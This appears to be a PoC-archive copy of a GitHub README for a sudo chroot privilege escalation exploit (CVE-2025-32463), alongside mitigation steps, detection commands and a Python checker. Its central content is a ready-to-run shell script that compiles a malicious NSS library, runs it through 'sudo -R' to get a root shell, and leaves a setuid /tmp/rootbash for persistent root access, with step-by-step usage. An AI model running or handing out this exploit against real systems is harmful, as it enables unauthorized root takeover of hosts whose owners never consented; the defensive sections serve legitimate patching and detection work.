Related vulnerability
Title:
Sudo security vulnerability
(CVE-2025-32463)
Description: Sudo is a program for Unix-like systems that lets users run commands with elevated privileges in a controlled way. Sudo versions before 1.9.17p1 contain a security vulnerability: using an /etc/nsswitch.conf located in a user-controlled directory can lead to obtaining root access.
Description
CVE-2025-32463 - Sudo Chroot Privilege Escalation Exploit
Introduction
# CVE-2025-32463 - Sudo Chroot Privilege Escalation Exploit
## Overview
CVE-2025-32463 is a critical local privilege escalation vulnerability in sudo versions 1.9.14 through 1.9.17. This vulnerability allows attackers with sudo privileges to escalate to root access by exploiting a design flaw in the chroot option processing logic.
## Vulnerability Details
- **CVE ID**: CVE-2025-32463
- **Affected Versions**: sudo 1.9.14 - 1.9.17
- **Vulnerability Type**: Local Privilege Escalation (LPE)
- **Severity**: Critical
- **Patched Version**: sudo 1.9.17p1 and later
## Technical Description
The vulnerability occurs due to a **timing issue in sudo's security validation process**. The `pivot_root` function is executed **before security policy verification**, allowing attackers to manipulate the file system environment that sudo uses for authentication and authorization.
### Attack Flow
1. **Environment Manipulation**: Attacker creates a controlled chroot environment with malicious `nsswitch.conf`
2. **Library Injection**: Malicious NSS (Name Service Switch) library is placed in the controlled environment
3. **Privilege Escalation**: sudo loads and executes the malicious library with root privileges
4. **Root Access**: Attacker gains full root shell access
### Affected Functions
- `pivot_root`: Executed too early in the process
- `set_cmnd_path`: Operates in the manipulated environment
- `command_matches`: Security checks bypassed due to environment manipulation
## Prerequisites
Before using this exploit, ensure the following conditions are met:
- [ ] Target system runs sudo version 1.9.14 - 1.9.17
- [ ] Current user has sudo privileges
- [ ] sudoers configuration allows chroot operations
- [ ] gcc compiler is available on the target system
- [ ] Write access to temporary directories (e.g., /tmp)
## Usage
### Quick Start
1. Clone this repository:
```
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
```
2. Make the script executable:
```
chmod +x cve-2025-32463.sh
```
3. Run the exploit:
```
./cve-2025-32463.sh
```
### Manual Verification
Check if the target system is vulnerable:
```
# Check sudo version
sudo --version
# Check sudo privileges
sudo -l
# Look for chroot-related permissions
sudo -l | grep chroot
```
## Exploit Code
The main exploit script (`cve-2025-32463.sh`):
```
#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit
STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1
cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
system("id > /tmp/pwned_proof.txt");
system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
execl("/bin/bash", "/bin/bash", NULL);
}
CEOF
mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c
echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
sudo -R pentest pentest
# Cleanup
rm -rf ${STAGE?}
```
## Verification
After successful exploitation, verify root access:
```
# Check current privileges
whoami
# Check proof file
cat /tmp/pwned_proof.txt
# Use setuid bash for persistent root access
/tmp/rootbash -p
```
## Mitigation
### Immediate Actions
1. **Update sudo** to version 1.9.17p1 or later:
```
# Ubuntu/Debian
sudo apt update && sudo apt upgrade sudo
# CentOS/RHEL
sudo yum update sudo
# or
sudo dnf update sudo
```
2. **Remove chroot directives** from sudoers (temporary workaround):
```
# Backup current configuration
sudo cp /etc/sudoers /etc/sudoers.backup
# Remove chroot-related entries
sudo sed -i '/chroot/d' /etc/sudoers
# Verify syntax
sudo visudo -c
```
### Detection
Monitor for exploitation attempts:
```
# Check for suspicious temporary directories
find /tmp -name "*.stage.*" -type d
# Monitor sudo logs
tail -f /var/log/auth.log | grep sudo
# Look for NSS library compilation
find /tmp -name "libnss_*.so*" -type f
```
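The version check, the sudoers review and the log monitoring above can be scripted so they run the same way on every host. The following Python is an added example, not code from this repository or from the sudo project. It assumes the affected range stated in this README (1.9.14 through 1.9.17, fixed in 1.9.17p1), that chroot use in sudoers appears as a `CHROOT=` command-spec tag or a `runchroot` Defaults entry, and that sudo's log line carries a `CHROOT=` field when a chroot is in effect (an assumption about the log format, so verify it against your own sudo logs). All sample inputs are constructed.

```python
"""Defensive checks for CVE-2025-32463 (sudo chroot privilege escalation).

Three pure functions a responder can point at real data:
  * is_affected_version()      -> is this `sudo --version` output inside the affected range?
  * find_chroot_grants()       -> which sudoers lines enable chroot (CHROOT= specs, runchroot Defaults)?
  * suspicious_chroot_events() -> which sudo log lines show a chroot into a relative or user-writable path?
"""
import re
from typing import List, Optional, Tuple

Version = Tuple[int, int, int, int]          # (major, minor, patch, p-level)

FIRST_AFFECTED: Version = (1, 9, 14, 0)      # range stated in the README
FIRST_FIXED: Version = (1, 9, 17, 1)         # 1.9.17p1

# Locations an unprivileged user can normally write to; a chroot rooted here deserves review.
USER_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

_VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?")
# Assumed log shape: "sudo:    alice : TTY=pts/0 ; CHROOT=/path ; PWD=... ; USER=root ; COMMAND=..."
_LOG_RE = re.compile(r"sudo:\s+(?P<user>\S+)\s+:.*?;\s*CHROOT=(?P<chroot>[^;]+)")


def parse_sudo_version(output: str) -> Optional[Version]:
    """Turn 'Sudo version 1.9.17p1' into (1, 9, 17, 1); a missing p-level counts as 0."""
    m = _VERSION_RE.search(output)
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def is_affected_version(output: str) -> bool:
    """True when the parsed version falls in [1.9.14, 1.9.17p1)."""
    v = parse_sudo_version(output)
    return v is not None and FIRST_AFFECTED <= v < FIRST_FIXED


def find_chroot_grants(sudoers_text: str) -> List[str]:
    """Return non-comment sudoers lines that enable chroot, for review before any edit.

    Run it over /etc/sudoers and every file under /etc/sudoers.d, not only the main file.
    """
    hits = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop trailing comments and commented-out lines
        if not line:
            continue
        if re.search(r"\bCHROOT=", line) or re.search(r"\brunchroot\b", line):
            hits.append(line)
    return hits


def suspicious_chroot_events(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (user, chroot_path) for sudo log lines whose chroot is relative or user-writable."""
    events = []
    for line in log_lines:
        m = _LOG_RE.search(line)
        if not m:
            continue
        chroot = m.group("chroot").strip()
        relative = not chroot.startswith("/")
        writable = chroot.startswith(USER_WRITABLE_PREFIXES)
        if relative or writable:
            events.append((m.group("user"), chroot))
    return events


if __name__ == "__main__":
    # Constructed sample inputs, not taken from a real host.
    print(is_affected_version("Sudo version 1.9.15p5\nSudoers policy plugin version 1.9.15p5"))
    print(find_chroot_grants("Defaults env_reset\nalice ALL=(root) CHROOT=/srv/jail /usr/bin/id\n"))
    print(suspicious_chroot_events([
        "Jul  1 10:15:02 host sudo:    alice : TTY=pts/0 ; CHROOT=/tmp/stage.Ab12Cd/jail ; "
        "PWD=/tmp/stage.Ab12Cd ; USER=root ; COMMAND=/usr/bin/id",
    ]))
```

The log check deliberately flags on the chroot location rather than on the exact temporary-directory name used by this script: the name is trivial to change, whereas a root-level chroot into a user-writable directory is unusual under any legitimate sudoers policy and is what an analyst should review.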
## Technical Details
### Root Cause Analysis
The vulnerability stems from a **design flaw in sudo's execution flow**:
1. **Normal Expected Flow**:
   - Parse user input
   - Validate sudoers policy
   - Set up environment (including chroot)
   - Execute command
2. **Actual Vulnerable Flow**:
   - Parse user input
   - **Execute chroot (pivot_root) - Problem occurs here**
   - Validate sudoers policy (in manipulated environment)
   - Execute command
### NSS Library Exploitation
The exploit leverages the Name Service Switch (NSS) system:
1. Sudo reads `/etc/nsswitch.conf` for user authentication
2. In the chroot environment, attacker controls this file
3. Malicious NSS library is loaded with root privileges
4. Library constructor executes arbitrary code as root
## Testing Environment
This exploit has been tested on:
- Ubuntu 20.04/22.04 with sudo 1.9.15
- Debian 11/12 with sudo 1.9.14-1.9.17
- CentOS 8/9 with affected sudo versions
- Docker containers with vulnerable sudo installations
## References
- [Official sudo security advisory](https://www.sudo.ws/security/advisories/)
- [Original research by Rich Mirch](https://github.com/kh4sh3i/CVE-2025-32463)
- [Sudo source code analysis](https://github.com/sudo-project/sudo)
## Disclaimer
⚠️ **IMPORTANT DISCLAIMER** ⚠️
This tool is provided for **educational and authorized testing purposes only**.
- Use only on systems you own or have explicit permission to test
- Unauthorized use of this exploit is illegal and unethical
- The authors are not responsible for any misuse or damage
- Always ensure you have proper authorization before conducting security testing
## Contributing
Contributions are welcome! Please:
1. Fork the repository
2. Create a feature branch
3. Submit a pull request with detailed description
## License
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
## Changelog
### v1.0.0
- Initial release
- Basic exploit functionality
- Comprehensive documentation
---
**Note**: This vulnerability affects a critical system component. Please use responsibly and ensure all testing is authorized.
File snapshot
[4.0K] /data/pocs/60374be6134c94ca4e599967f27ef3fb4a900684
├── [ 800] cve-2025-32463.sh
├── [6.9K] LICENSE
└── [6.2K] README.md
0 directories, 3 files
Notes
1. Accessing the original source is recommended.
2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.